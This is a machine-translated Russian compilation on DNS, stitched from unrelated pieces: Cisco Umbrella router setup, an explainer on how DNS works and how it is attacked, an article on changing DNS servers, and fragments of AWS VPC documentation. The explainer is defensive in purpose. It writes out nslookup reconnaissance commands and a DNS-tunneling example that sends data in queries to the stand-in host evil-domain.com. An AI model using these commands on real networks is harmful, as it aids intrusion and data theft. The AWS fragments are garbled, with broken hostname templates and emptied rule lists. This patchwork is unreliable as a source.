Примечание: Мы рекомендуем, чтобы только пользователи, имеющие административный доступ к маршрутизатору, DNS-серверу или собственному компьютеру, пытались использовать эти инструкции, поскольку вам необходим этот уровень доступа для выполнения этих шагов.
Определите, какое устройство или сервер в вашей сети поддерживает адреса ваших общедоступных DNS-серверов — чаще всего это маршрутизатор или DNS-сервер. Обычно устройство, которое предоставляет внутренний немаршрутизируемый IP-адрес (DHCP), или устройство, которое служит вашим шлюзом по умолчанию, также является местом, где вы настраиваете общедоступные DNS-серверы.
После входа в систему найдите настройки DNS для этого устройства. Если вы не знаете, где находятся эти настройки, см. Шаг 3 — Измените адреса DNS-сервера для получения инструкций по настройке сервера или маршрутизатора.Также попробуйте одно из следующих руководств:
Примечание: Некоторые интернет-провайдеры жестко встраивают свои DNS-серверы в оборудование, которое они предоставляют. Если вы используете такое устройство, вы не сможете настроить его для использования Umbrella. Вместо этого вы можете настроить каждый из своих компьютеров, установив роуминг-клиент Umbrella или настроив адреса DNS-серверов на каждом компьютере. Инструкции по настройке типичного компьютера с Windows или Macintosh можно найти здесь.
Процесс изменения настроек DNS зависит от операционной системы и версии (Windows, Mac или Linux) или устройства (DNS-сервер, маршрутизатор или мобильное устройство).Эта процедура может не применяться к вашей ОС, маршрутизатору или устройству. Для получения достоверной информации см. Документацию поставщика.
Чтобы изменить настройки на обычном маршрутизаторе:
- В браузере введите IP-адрес для доступа к пользовательскому интерфейсу маршрутизатора и введите свой пароль.
- Найдите область конфигурации, в которой указаны настройки DNS-сервера, и замените эти адреса IP-адресами Cisco Umbrella.
Вы можете использовать DNS-адрес IPV4 или IPv6 в качестве основного или дополнительного DNS-сервера; однако вы должны использовать оба числа, а не один и тот же IP-адрес дважды.Если ваш маршрутизатор требует настройки третьего или четвертого DNS-сервера, используйте 208.67.220.222 и 208.67.222.220 или 2620: 119: 35 :: 35 и 2620: 119: 53 :: 53 в качестве третьей и четвертой записи соответственно.
- Сохраните изменения и выйдите из пользовательского интерфейса маршрутизатора.
- Очистите кеш DNS.
- Убедитесь, что ваша установка работает правильно. См. Шаг 4 — Проверьте новые настройки DNS.
Примечание: Не забудьте подтвердить, что ваш DNS настроен как статический.
Серверы электронной почты имеют уникальные конфигурации DNS, и мы не рекомендуем указывать их для использования Umbrella.Для получения дополнительной информации см. Umbrella и ваш почтовый сервер.
Теперь, когда вы настроили настройки DNS, перейдите на http://welcome.umbrella.com. Если вы успешно указали свой DNS на серверы Cisco Umbrella, появится страница приветствия Umbrella.
Что такое DNS, как это работает + уязвимости
Система доменных имен (DNS) — это интернет-версия Желтых страниц. В старину, когда вам нужно было найти адрес компании, вы искали его в желтых страницах.DNS работает точно так же, за исключением того, что вам на самом деле не нужно ничего искать: ваш компьютер, подключенный к Интернету, сделает это за вас. Благодаря ему ваш компьютер может найти Google, ESPN.com или Varonis.com.
Протокол требует, чтобы два компьютера обменивались данными в IP-сети. Подумайте об IP-адресе как о почтовом адресе — чтобы один компьютер «нашел» другой, ему нужно знать номер другого компьютера. Поскольку большинство людей лучше запоминают имена — www.varonis.com — чем числа — 104.196.44.111, им нужна была программа для компьютеров, переводящая имена в IP-адреса.
Ненавидите компьютеры в профессиональном плане? Попробуйте карты против ИТ.
Программа для преобразования имен в числа и наоборот называется «DNS» или система доменных имен, а компьютеры, на которых работает DNS, называются «DNS-серверами». Без DNS нам пришлось бы запоминать IP-адрес любого сервера, к которому мы хотели подключиться, — неинтересно.
Как работает DNSDNS является такой неотъемлемой частью Интернета, что важно понимать, как он работает.
Думайте о DNS как о телефонной книге, но вместо того, чтобы сопоставлять имена людей с их уличными адресами, телефонная книга сопоставляет имена компьютеров с IP-адресами. Каждое сопоставление называется «записью DNS».
В Интернете много компьютеров, поэтому нет смысла собирать все записи в одну большую книгу. Вместо этого DNS организован в виде небольших книг или доменов. Домены могут быть очень большими, поэтому они организованы в более мелкие книги, называемые «зонами». Ни один DNS-сервер не хранит все книги — это было бы непрактично.
Вместо этого существует множество DNS-серверов, которые хранят все записи DNS для Интернета. Любой компьютер, который хочет узнать номер или имя, может запросить свой DNS-сервер, и его DNS-сервер знает, как запрашивать — или запрашивать — другие DNS-серверы, когда им нужна запись. Когда DNS-сервер запрашивает другие DNS-серверы, он выполняет «восходящий» запрос. Запросы для домена могут идти «вверх по течению», пока не вернутся к полномочиям домена или «авторитетному серверу имен».
Авторитетный сервер имен — это то место, где администраторы управляют именами серверов и IP-адресами своих доменов. Всякий раз, когда администратор DNS хочет добавить, изменить или удалить имя сервера или IP-адрес, он вносит изменения в свой авторитетный DNS-сервер (иногда называемый «главным DNS-сервером»). Также существуют «подчиненные» DNS-серверы; эти DNS-серверы содержат копии DNS-записей для своих зон и доменов.
Четыре DNS-сервера, загружающие веб-страницу
- DNS-рекурсор: DNS-рекурсор — это сервер, который отвечает на DNS-запрос и запрашивает адрес у другого DNS-сервера или уже имеет сохраненный IP-адрес для сайта.
- Корневой сервер имен : корневой сервер имен — это сервер имен для корневой зоны. Он отвечает на прямые запросы и может возвращать список авторитетных серверов имен для соответствующего домена верхнего уровня.
- Сервер имен TLD: Сервер домена верхнего уровня (TLD) — это один из DNS-серверов высокого уровня в Интернете. При поиске по адресу www.varonis.com сначала ответит сервер TLD для домена . com, а затем DNS выполнит поиск по запросу varonis.
- Авторитетный сервер имен: Авторитетный сервер имен является последней остановкой для DNS-запроса.Официальный сервер имен имеет DNS-запись для запроса.
Типы службы DNS
В Интернете есть два различных типа DNS-сервисов. Каждая из этих служб обрабатывает запросы DNS по-разному в зависимости от их функции.
- Рекурсивный преобразователь DNS: Рекурсивный преобразователь DNS — это DNS-сервер, который отвечает на запрос DNS и ищет авторитетный сервер имен или кэшированный результат DNS для запрошенного имени.
- Полномочный DNS-сервер: Полномочный DNS-сервер хранит DNS-запрос.Поэтому, если вы запрашиваете у авторитетного DNS-сервера один из его IP-адресов, ему больше не нужно спрашивать. Авторитетный сервер имен является последней инстанцией для этих имен и IP-адресов.
Общедоступный DNS и частный DNS
DNS был создан, чтобы люди могли подключаться к услугам в Интернете. Чтобы сервер был доступен в общедоступном Интернете, ему нужна общедоступная запись DNS, а его IP-адрес должен быть доступен в Интернете — это означает, что он не заблокирован брандмауэром.Общедоступные DNS-серверы доступны всем, кто может к ним подключиться, и не требуют аутентификации.
Интересно, что не все записи DNS являются общедоступными. Сегодня, помимо разрешения сотрудникам использовать DNS для поиска вещей в Интернете, организации используют DNS, чтобы их сотрудники могли находить частные внутренние серверы. Когда организация хочет, чтобы имена серверов и IP-адреса оставались конфиденциальными или недоступными напрямую из Интернета, они не перечисляют их на общедоступных DNS-серверах. Вместо этого организации перечисляют их на частных или внутренних DNS-серверах — внутренние DNS-серверы хранят имена и IP-адреса для внутренних файловых серверов, почтовых серверов, контроллеров домена, серверов баз данных, серверов приложений и т. Д.- все самое важное.
Что нужно запомнить — как и внешние DNS-серверы, внутренние DNS-серверы не требуют аутентификации. Это потому, что DNS был создан давно, когда безопасность не была такой большой проблемой. В большинстве случаев любой, кто находится внутри брандмауэра — путем проникновения или подключения через VPN — может запрашивать внутренние DNS-серверы. Единственное, что мешает кому-либо «извне» получить доступ и запросить внутренние DNS-серверы, — это то, что они не могут подключиться к ним напрямую.
- Общедоступный DNS: Чтобы сервер был доступен в общедоступном Интернете, ему нужна общедоступная запись DNS, а его IP-адрес должен быть доступен в Интернете.
- Частный DNS : компьютеры, которые находятся за брандмауэром или во внутренней сети, используют частную запись DNS, чтобы локальные компьютеры могли идентифицировать их по имени. Внешние пользователи Интернета не будут иметь прямого доступа к этим компьютерам.
7 шагов поиска DNS
Давайте посмотрим, как именно работает DNS-запрос.
- DNS-запрос запускается при попытке доступа к компьютеру в Интернете . Например, вы набираете www.varonis.com в адресной строке браузера.
- Первой остановкой для DNS-запроса является локальный DNS-кеш. При доступе к разным компьютерам эти IP-адреса сохраняются в локальном репозитории. Если вы ранее посещали www.varonis.com, у вас есть IP-адрес в вашем кеше.
- Если у вас нет IP-адреса в локальном кэше DNS, DNS проверит его с помощью рекурсивного DNS-сервера. Ваша ИТ-группа или поставщик услуг Интернета (ISP) обычно предоставляет для этой цели рекурсивный DNS-сервер.
- У рекурсивного DNS-сервера есть собственный кеш, и если у него есть IP-адрес, он вернет его вам. Если нет, он запросит другой DNS-сервер.
- Следующая остановка — это серверы имен TLD, в данном случае сервер имен TLD для адресов .com. У этих серверов нет нужного нам IP-адреса, но они могут отправить DNS-запрос в правильном направлении.
- Что есть у серверов имен TLD, так это расположение официального сервера имен для запрошенного сайта. Официальный сервер имен отвечает IP-адресом для www.varonis.com, а рекурсивный DNS-сервер сохраняет его в локальном кэше DNS и возвращает адрес вашему компьютеру.
- Ваша местная служба DNS получает IP-адрес и подключается к www.varonis.com для загрузки всего великолепного контента. DNS затем записывает IP-адрес в локальный кеш со значением времени жизни (TTL). TTL — это время, в течение которого локальная запись DNS действительна, и после этого времени DNS снова выполнит процесс, когда вы запросите Varonis.com в следующий раз.
Какие типы DNS-запросов?
DNS-запросы — это компьютерный код, который сообщает DNS-серверам, что это за запрос и какую информацию он хочет получить обратно. В стандартном поиске DNS есть три основных DNS-запроса.
- Рекурсивный запрос: В рекурсивном запросе компьютер запрашивает IP-адрес или подтверждение того, что DNS-сервер не знает этот IP-адрес.
- Итеративный запрос: Итеративный запрос, который запрашивающая сторона запрашивает у DNS-сервера лучший ответ, который у него есть. Если DNS-сервер не имеет IP-адреса, он вернет авторитетный сервер имен или сервер имен TLD. Запрашивающая сторона будет продолжать этот итеративный процесс до тех пор, пока не найдет ответ или не истечет время ожидания.
- Нерекурсивный запрос: Преобразователь DNS будет использовать этот запрос для поиска IP-адреса, которого нет в его кэше. Они ограничены одним запросом на ограничение использования полосы пропускания сети.
Что такое DNS-кеш + функции кеширования
DNS cache — это хранилище доменных имен и IP-адресов, которые хранятся на компьютере, поэтому ему не нужно каждый раз запрашивать IP-адрес.Представьте, что каждый раз, когда какой-либо пользователь пытается перейти на www.varonis.com, DNS должен запрашивать авторитетный сервер имен в Varonis. Трафик будет огромным! Сама мысль о таком большом трафике — вот почему у нас есть кеширование DNS. Кэширование DNS преследует две основные цели:
- Ускорение DNS-запросов
- Уменьшить пропускную способность DNS-запросов в Интернете
Однако методология кеширования DNS имеет некоторые проблемы:
- Изменениям DNS требуется время для распространения — это означает, что может пройти некоторое время, прежде чем каждый DNS-сервер обновит свой кеш до последних данных IP. Кэш
- DNS — потенциальный вектор атаки для хакеров
В Интернете используется несколько различных типов кэширования DNS:
- Кэширование DNS в браузере: Текущие браузеры примерно на 2018 год имеют встроенную функцию кэширования DNS.Разрешение DNS с помощью локального кеша выполняется быстро и эффективно.
- Операционная система (ОС) Кэширование DNS: Ваш компьютер является DNS-клиентом, и на вашем компьютере есть служба, которая управляет разрешением и запросами DNS. Этот DNS-кеш также является локальным и, следовательно, быстрым и не требует полосы пропускания.
- Рекурсивное разрешение DNS-кеширования: Каждый DNS-рекурсор имеет DNS-кеш и хранит любой IP-адрес, который он знает, чтобы использовать для следующего запроса
Слабые стороны и уязвимости DNS
Существует три основных уязвимости DNS, на которые следует обратить внимание, которые злоумышленники часто используют для злоупотребления DNS:
- Внутренние DNS-серверы хранят все имена серверов и IP-адреса для своих доменов и будут делиться ими со всеми, кто их спросит. Это делает DNS отличным источником информации для злоумышленников, когда они пытаются провести внутреннюю разведку.
- Кеши DNS не являются «авторитетными», и ими можно манипулировать. Если ваш DNS-сервер «отравлен» плохими записями, компьютеры могут быть обмануты, и они попадут в плохие места.
- DNS передает информацию о запросах от внутренних рабочих станций к внешним серверам, и злоумышленники научились использовать это поведение для создания «скрытых каналов» для эксфильтрации данных.
Использовать DNS для разведки
Как только злоумышленник оказывается внутри брандмауэра и получает контроль над компьютером, он может использовать DNS для поиска важных имен серверов. Злоумышленники могут искать имена, связанные с внутренними IP-адресами — почтовые серверы, серверы имен — все виды ценных вещей. Если они достаточно сообразительны, они могут даже получить внутренний DNS-сервер для отправки большого количества информации о зонах их домена — это называется «атакой передачи зоны DNS». ”
Если у вас компьютер Windows, выполните следующие команды как есть; если вы пользователь Linux, вы можете найти соответствующие команды.
- Откройте командную строку (введите Ctrl + esc, буквы «cmd», затем введите).
- Тип ipconfig
- Вы увидите DNS-домен, в котором вы находитесь (DNS-суффикс для конкретного подключения), ваш IP-адрес и множество других вещей. Вы захотите вернуться к этому.
- Введите nslookup [IP-адрес] Вы увидите имя DNS-сервера, который отвечает, и, если имя известно, DNS-запись с указанием имени и IP-адреса.
- nslookup –type = soa [ваш домен] Эта команда возвращает ваш авторитетный DNS-сервер, это не поможет, если вы пытаетесь проникнуть в сеть.
- nslookup –type = MX [ваш домен] Эта команда возвращает все почтовые серверы в вашем локальном домене на тот случай, если вы хотите взломать почтовые серверы и не знаете, где они находятся.
Использовать DNS для перенаправления трафика
Помните, когда пользователь пытается перейти на веб-сайт, его компьютер запрашивает у своего DNS-сервера IP-адрес сайта или запись DNS. Если DNS-сервер имеет кэшированную копию записи, он отвечает. В противном случае он запрашивает «вышестоящий» DNS-сервер, передает результаты обратно конечному пользователю и кэширует их для следующего раза.
Злоумышленники нашли способ подделать ответы DNS или сделать так, чтобы ответы выглядели так, как будто они исходят от законных серверов DNS. Не вдаваясь в технические подробности, злоумышленники используют для этого три слабых места в DNS:
- DNS выполняет очень слабую проверку ответов, поступающих от вышестоящих серверов. Ответы просто должны содержать правильный идентификатор транзакции, который представляет собой всего лишь 16-битное число (0-65536). Оказывается, что вам не нужно столько людей в комнате, чтобы получить преимущество, чтобы двое из них имели один и тот же день рождения, оказывается, что угадать правильный идентификатор легче, чем вы думаете.
- DNS-серверы принимают одновременные (или почти одновременные) ответы на свои запросы , позволяя злоумышленникам делать несколько предположений об идентификаторе транзакции (что мало похоже на атаку грубой силы на пароль).
- IP-соединения, используемые DNS, легко «подделать». Это означает, что злоумышленник может отправить трафик на DNS-сервер с одного компьютера и сделать так, чтобы он выглядел так, как будто он идет с другого компьютера, как действительный DNS-сервер. Только определенные типы IP-соединений легко подделать — DNS является одним из них.
Если злоумышленник успешно подделывает ответ DNS, он может заставить принимающий DNS-сервер кэшировать зараженную запись. Так как это поможет злоумышленникам?
Вот пример. Допустим, злоумышленник узнает, что ваша организация использует внешнее приложение для чего-то важного, например для расходов.Если они отравляют DNS-сервер вашей организации, чтобы он отправлял каждого пользователя на сервер злоумышленника, все, что им нужно сделать, это создать легитимную страницу входа в систему, и пользователи будут вводить свои учетные данные. Они могут даже ретранслировать трафик на реальный сервер (действуя как «человек посередине»), чтобы никто не заметил. Затем злоумышленник может попробовать эти учетные данные в других системах, продать их или просто отпраздновать это злым смехом.
Использование DNS в качестве скрытого канала
Допустим, злоумышленник сумел проникнуть в сеть (корп.com), скомпрометировали один или два хоста и обнаружили важные данные, которые они хотят эксфильтровать. Как они могут это сделать, не подавая никаких сигналов тревоги? Для этого злоумышленники используют метод, называемый «DNS-туннелирование». Они устанавливают DNS-домен (например, evil-domain.com) в Интернете и создают авторитетный сервер имен. Затем на взломанном хосте злоумышленник может использовать программу, которая разбивает данные на небольшие части и вставляет их в серию запросов, например:
- nslookup My1secret1.evil-domain.com
- nslookup is1that1I1know.evil-domain.com
- nsllookup how2steal1data.evil-domain.com
DNS-сервер corp.com получит эти запросы, поймет, что результатов нет в его кеше, и ретранслирует эти запросы обратно на полномочный сервер имен evil-domain. com. Злоумышленник ожидает этот трафик, поэтому он запускает программу на полномочном сервере имен, чтобы извлечь первую часть запроса (все, что было до evil-domain.com) и собрать ее заново.Если организация не проверяет запросы своих DNS-серверов, они могут никогда не понять, что их DNS-серверы использовались для кражи данных.
DNS существует уже давно, и каждый компьютер, подключенный к Интернету, полагается на него. Злоумышленники теперь используют DNS как для внешней, так и для внутренней разведки, для перехвата трафика и создания скрытых каналов связи. К счастью, с помощью мониторинга DNS-серверов и применения аналитики безопасности многие из этих атак можно обнаружить и предотвратить.
Хотите увидеть, как? Присоединяйтесь к нашим семинарам по кибератакам в реальном времени, когда наши инженеры по безопасности проводят живую атаку — эксфильтруют данные через туннелирование DNS и просматривают все в режиме реального времени!
Как (и почему) изменить DNS-сервер
У вас, вероятно, есть базовое представление о том, как работает веб-серфинг. Вы вводите pcmag.com в адресной строке, ваш браузер запрашивает эту страницу у веб-хоста, и PCMag отправляет вам множество полезной информации. Но не все так просто. В этом участвует еще один игрок, и понимание этого факта может помочь вам защитить вашу безопасность и конфиденциальность — и даже ускорить просмотр.
Вот в чем дело: серверы, которые маршрутизируют ваши интернет-запросы, не понимают доменные имена, такие как pcmag.com. Они понимают только числовые IP-адреса, такие как 52.201.108.115, или более длинные числовые адреса из современной системы IPv6. (Под более длинным я подразумеваю лот на длиннее. Вот пример IPv6-адреса: 2001: 0db8: 85a3: 0000: 0000: 8a2e: 0370: 7334.)
Что делают DNS-серверы?
Итак, машины говорят только числа, но люди хотят использовать запоминающиеся доменные имена, такие как girlgeniusonline.com или zappa.com. Чтобы разрешить этот тупик, система доменных имен или DNS обрабатывает преобразование понятных доменных имен в числовые IP-адреса.
Ваша домашняя сеть обычно использует DNS-сервер, предоставляемый вашим интернет-провайдером. После того, как ваш браузер отправляет серверу доменное имя, сервер выполняет умеренно сложное взаимодействие с другими серверами, чтобы вернуть соответствующий IP-адрес, тщательно проверенный и проверенный. Если это часто используемый домен, DNS-сервер может хранить эту информацию в кэше для более быстрого доступа.Теперь, когда взаимодействие сводится к цифрам, машины могут обрабатывать страницы, которые вы хотите просмотреть.
Проблемы с DNS
Как видите, система доменных имен необходима для всех ваших действий в Интернете. Любые проблемы с системой могут иметь каскадный эффект на ваш опыт.
Во-первых, если DNS-серверы, предоставляемые интернет-провайдером, работают медленно или неправильно настроены для кэширования, они могут существенно замедлить ваше соединение. Это особенно верно, когда вы загружаете страницу, которая привлекает контент из разных доменов, таких как рекламодатели и аффилированные лица. Переключение на DNS-серверы, оптимизированные для повышения эффективности, может ускорить просмотр страниц как дома, так и на работе.
Говоря о бизнес-среде, некоторые компании предлагают службы DNS с удобными для бизнеса надстройками. Например, они могут отфильтровывать вредоносные веб-сайты на уровне DNS, чтобы страницы никогда не доходили до браузера сотрудника. Они также могут отфильтровывать порнографические и другие сайты, неприемлемые для работы. Аналогичным образом системы родительского контроля на основе DNS помогают родителям контролировать доступ детей к контенту, не подходящему по возрасту, на каждом устройстве.
Я упоминал, что ваш DNS-сервер кэширует популярные запросы, поэтому он может быстро отвечать, без необходимости запрашивать другие компоненты системы доменных имен. На вашем ПК или Mac также есть локальный DNS-кеш, и если кеш будет испорчен, у вас могут возникнуть проблемы с посещением определенных сайтов. Вот проблема, которая не требует переключения DNS-серверов — все, что вам нужно сделать, это очистить локальный DNS-кеш.
Если вы не используете VPN (виртуальную частную сеть), DNS-серверы вашего интернет-провайдера видят каждый запрашиваемый вами домен.Вы действительно не можете уйти от этого — если вы хотите что-то из Интернета, вы не можете не сказать кому-то , что вы хотите. Ваш интернет-провайдер знает, где вы находитесь в Интернете, и ему, вероятно, все равно.
Однако некоторые интернет-провайдеры нашли способ монетизировать свою службу DNS. Когда вы попадаете в ошибочный домен, у которого нет реального IP-адреса, они перенаправляют ваш браузер на страницу поиска и рекламы, предварительно загруженную поисковой фразой, полученной из имени домена. Например, на изображении ниже показаны результаты попытки посетить несуществующие забавные изображения.com.
Может показаться, что это не проблема. Какая разница, показывает ли интернет-провайдер рекламу? Но с точки зрения конфиденциальности это важно. Вы начали с личного обмена между вашим браузером и DNS-сервером. Интернет-провайдер сломал этот пузырь конфиденциальности, отправив версию вашего запроса в поисковую систему, где она попадает в вашу историю поиска. Некоторые люди беспокоятся о конфиденциальности поиска, поэтому существуют поисковые сайты без истории, такие как DuckDuckGo и StartPage.
DNS под атакой
Вы, наверное, знакомы с концепцией фишинга.Подлые веб-мастера создают мошеннический веб-сайт, который выглядит точно так же, как PayPal, или ваш банк, или даже сайт игр или знакомств. Они распространяют ссылки на поддельный сайт, используя спам, вредоносную рекламу или другие методы. Любой незадачливый пользователь сети, который входит в систему, не заметив подделки, дал плохим парням ценные учетные данные. И мошенники обычно используют эти учетные данные для входа на настоящий сайт, чтобы вы не осознавали, что что-то произошло.
Единственное, что выдает эти мошенничества, — это адресная строка.Внимательное наблюдение за адресной строкой — один из способов избежать фишинговых атак. Некоторые из них вопиющие, например страница, которая претендует на роль, скажем, LinkedIn, но имеет совершенно не связанный домен, такой как bestastroukusa.com. Другие трудятся усерднее, чтобы обмануть вас, используя слегка нечеткие имена, например, microsfot.com, или очень длинные URL-адреса, скрывающие реальный домен. Но как бы они ни старались, зоркого интернет-серфера не обмануть.
Вот здесь и появляется отравление кеша. В этом виде атаки злоумышленники внедряют неверную информацию в систему доменных имен, обычно путем манипулирования кешем.Пользователь вводит допустимое доменное имя, зараженная система DNS возвращает IP-адрес мошеннического сайта, а в адресной строке отображается допустимое имя. Если злоумышленники плохо имитировали целевой сайт, нет видимых ключей к их ухищрениям.
Аналогичная атака, называемая перехватом DNS, происходит на вашем локальном компьютере. Вредоносное ПО, запущенное в системе, проникает в настройки TCP / IP и просто переключает вас на DNS-сервер, управляемый хакерами. Конечно, это работает только в том случае, если рассматриваемое вредоносное ПО может пройти через ваш антивирус, но все же есть несколько человек, которые не получили сообщения об использовании антивируса на каждом компьютере.
Какой лучший DNS-сервер?
DNS-атаки и проблемы возникают, когда DNS не является приоритетом для вашего интернет-провайдера. Уйти от этих проблем можно так же просто, как переключиться на службу, которая делает безопасность и конфиденциальность DNS приоритетом.
Google Public DNS доступен уже почти 10 лет с легко запоминающимися IP-адресами 8.8.8.8 и 8.8.4.4. Google обещает безопасное DNS-соединение, защищенное от атак, а также преимущества в скорости.
Основанная в 2005 году, OpenDNS уже давно предлагает безопасный DNS.У него нет запоминающихся IP-адресов, как у Google, но он предлагает множество услуг. В дополнение к DNS-серверам, ориентированным на конфиденциальность и безопасность, он предлагает так называемые серверы FamilyShield, которые отфильтровывают нежелательный контент. Компания также предлагает премиальную систему родительского контроля, которая дает родителям более детальный контроль над фильтрацией. Ее материнская компания Cisco поставляет предприятиям Cisco Umbrella, которая включает услуги безопасности и DNS для предприятий.
Cloudflare может быть крупнейшей интернет-компанией, о которой вы никогда не слышали.Обладая обширной всемирной коллекцией серверов, он, среди прочего, предлагает веб-сайты интернет-безопасность и защиту от распределенных атак типа «отказ в обслуживании». В прошлом году Cloudflare сделал доступным безопасный DNS на очень запоминающихся IP-адресах 1.1.1.1 и 1.0.0.1. Совсем недавно компания приступила к реализации плана своего мобильного приложения 1.1.1.1, призванного заменить защиту VPN.
Существуют и другие бесплатные общедоступные службы DNS, ориентированные на безопасность, но вы не ошибетесь, выбрав эти три больших.На практике поле может сокращаться. В прошлом году Symantec закрыла свою службу Norton ConnectSafe, вместо этого направив пользователей на OpenDNS.
Как мне изменить DNS-сервер моего маршрутизатора?
Что касается переключения вашего маршрутизатора на быстрый и безопасный DNS-сервер, у меня есть хорошие и плохие новости. Хорошая новость заключается в том, что если вы внесете изменения в настройки маршрутизатора, это повлияет на все подключенные устройства. Не только компьютеры и смартфоны, но и видеодомофоны, умные гаражные ворота и даже тостеры с доступом в Интернет.Плохая новость заключается в том, что точный метод изменения настроек DNS вашего маршрутизатора отличается для каждого маршрутизатора.
Рекомендовано нашими редакторами
Для начала поищите в Интернете, добавив «изменить DNS» к марке и модели вашего маршрутизатора. Если повезет, вы найдете четкий набор инструкций. Перейдите к желаемой настройке и введите основной и альтернативный DNS-адреса для выбранной вами службы. Возможно, вам потребуется перезагрузить маршрутизатор, чтобы изменения вступили в силу.
Прорабатывая шаги для этой статьи, я получил неприятный сюрприз. Оказалось, что маршрутизатор, предоставленный моим интернет-провайдером, который обеспечивает доступ в Интернет, телевидение и телефонную связь, не позволяет мне изменять настройки DNS. Очевидно, настоящий сетевой мастер мог бы внести изменения, используя Telnet для входа в маршрутизатор, который номинально не поддерживает Telnet. Я предполагаю, что интернет-провайдер хочет зафиксировать доход от этих рекламных и поисковых страниц.
Как изменить DNS-сервер моего ноутбука?
Теперь все устройства в вашей домашней сети используют быстрый и безопасный DNS, но у вас, вероятно, есть устройства, которые не остаются в домашней сети.Когда ваш ноутбук или смартфон подключается к бесплатному Wi-Fi в этом неряшливом интернет-кафе, вы также используете любой DNS-сервер, который владелец выбрал по умолчанию. Кому нужно отравление кеша, когда у вас есть полный контроль над DNS?
Вот почему вам следует изменить локальные настройки DNS на своих мобильных устройствах. То, как вы это делаете, зависит от платформы. В Windows 10:
- Нажмите кнопку Windows,
- Выберите шестеренку настроек,
- Нажмите Сеть и Интернет,
- Щелкните Изменить параметры адаптера,
- Щелкните правой кнопкой мыши соединение Wi-Fi и выберите Свойства,
- Выберите Интернет-протокол версии 4 и нажмите кнопку «Свойства»,
- Щелкните элемент с надписью Использовать следующие адреса DNS-серверов,
- Введите два адреса,
- Нажмите ОК и, при необходимости,
- Повторите процесс для Интернет-протокола версии 6.
Да, это довольно много шагов, но вы можете это сделать!
Если вы используете ноутбук с macOS:
- Выберите «Настройки» в меню Apple,
- Запустите приложение «Сеть»,
- Выделите соединение Wi-Fi и нажмите кнопку «Дополнительно»,
- Щелкните вкладку DNS,
- Используйте кнопку со знаком плюса, чтобы добавить адреса DNS IPv4 и IPv6, а
- Используйте кнопку со знаком минус, чтобы удалить все существующие адреса.
Что касается ваших мобильных устройств, версии Android до 9 (Pie) и все версии iOS просто не поддерживают глобальное изменение ваших предпочтений DNS. Вам нужно подключиться и внести изменения каждый раз, когда вы подключаетесь к новой сети Wi-Fi, и вы не можете коснуться настроек DNS для сотовой сети. Это правда, что на обеих платформах вы можете купить приложение для автоматизации этого изменения, если хотите. Но если вы собираетесь купить приложение, я бы посоветовал вам просто запустить VPN на этих устройствах. При этом ваши DNS-запросы будут шунтироваться через серверы компании VPN, которые в большинстве случаев более безопасны, чем то, что вы получите от своего интернет-провайдера.
В будущем приложение Cloudflare 1.1.1.1 выглядит интересным решением DNS для мобильных устройств, и оно бесплатное. Грядущее усовершенствование под названием Warp сделает его больше похожим на VPN. Когда приложение с расширенными возможностями VPN выйдет в общий выпуск, мы проверим его и дадим вам знать.
Итак, вот краткое изложение. DNS-серверы переводят понятные человеку доменные имена в понятные для машины IP-адреса. Вероятно, вы используете DNS-сервер, предоставленный вашим интернет-провайдером, качество которого неизвестно. Переход на стороннюю службу DNS может как ускорить вашу интернет-активность, так и защитить от хитрых DNS-атак.
Получите наши лучшие истории!
Подпишитесь на Что нового сейчас , чтобы получать наши главные новости на ваш почтовый ящик каждое утро
Этот информационный бюллетень может содержать рекламу, предложения или партнерские ссылки. Подписка на информационный бюллетень означает ваше согласие с нашими Условиями использования и Политикой конфиденциальности. Вы можете отказаться от подписки на информационные бюллетени в любое время.
Использование DNS с вашим VPC
Система доменных имен (DNS) — это стандарт, по которому разрешаются имена, используемые в Интернете. к их соответствующие IP-адреса.Имя хоста DNS — это имя, которое однозначно и абсолютно называет компьютер; он состоит из имени хоста и имени домена. DNS-серверы разрешают DNS имена хостов для их соответствующие IP-адреса.
общедоступных IPv4-адреса обеспечивают связь через Интернет, а частные IPv4-адреса включить связь в сети экземпляра (EC2-Classic или VPC).Для большего Для получения дополнительной информации см. раздел «IP-адресация в вашем VPC».
Мы предоставляем DNS-сервер (Amazon Route 53 Resolver) для вашего VPC. Чтобы использовать собственный DNS-сервер, создайте новый набор параметров DHCP для вашего VPC. Для более информацию см. в разделе «Наборы опций DHCP».
DNS-имена хостов
Мы предоставляем ваш экземпляр в VPC с общедоступными и частными именами хостов DNS, которые соответствуют общедоступному IPv4 и частному IPv4-адресу экземпляра. Мы не укажите имена хостов DNS для адресов IPv6.
Частные имена хостов DNS
Частное (внутреннее) имя хоста DNS преобразуется в частный IPv4-адрес
пример. Частное имя хоста DNS принимает форму ip-адрес
для региона частный ipv4-адрес
.ec2.internal us-east-1
и ip-адрес
для других регионов (где частный ipv4-адрес
. регион
. Compute.internal
наоборот
поиск IP-адреса). Вы можете использовать частное имя хоста DNS для связи между
экземпляров в той же сети, но мы не можем разрешить имя хоста DNS за пределами
сеть, в которой находится экземпляр. private-ipv4-address
Когда вы запускаете экземпляр в VPC, он всегда получает частный DNS имя хоста.
Общедоступные имена хостов DNS
Общедоступное (внешнее) имя хоста DNS имеет вид ec2-
для региона общедоступный ipv4-адрес
.compute-1.amazonaws.com us-east-1
и ec2-
для других регионов. DNS-сервер Amazon разрешает общедоступное имя хоста DNS в
общедоступный IPv4-адрес экземпляра за пределами сети экземпляра и для
частный IPv4-адрес экземпляра из сети экземпляра.Для
дополнительную информацию см. в разделе Общедоступные IPv4-адреса и внешние имена хостов DNS в Руководство пользователя Amazon EC2 для инстансов Linux . общедоступный ipv4-адрес
. регион
.compute.amazonaws.com
Когда вы запускаете экземпляр в VPC, он получает общедоступное имя хоста DNS, если у него есть
а
общедоступный IPv4-адрес, и если и имена хостов DNS, и атрибуты поддержки DNS для
ваш
Для VPC установлено значение , истинное значение
.Дополнительные сведения см. В разделе Поддержка DNS в вашем VPC.
Поддержка DNS в вашем VPC
Ваш VPC имеет атрибуты, определяющие, получают ли экземпляры, запущенные в VPC, общедоступные имена хостов DNS, соответствующие их общедоступным IP-адресам, и разрешающая способность через DNS-сервер Amazon поддерживается для VPC.
Атрибут | Описание |
---|---|
enableDnsHostnames | Указывает, получают ли экземпляры с общедоступными IP-адресами соответствующие общедоступные Имена хостов DNS. Если этот атрибут равен |
enableDnsSupport | Указывает, поддерживается ли разрешение DNS. Если этот атрибут имеет значение Если этот атрибут равен |
Применяются следующие правила:
Если для обоих атрибутов установлено значение
, истина
, происходит следующее:Если для одного или обоих атрибутов установлено значение
false
, происходит следующее:Экземпляры с общедоступным IP-адресом не получают соответствующие общедоступные Имена хостов DNS.
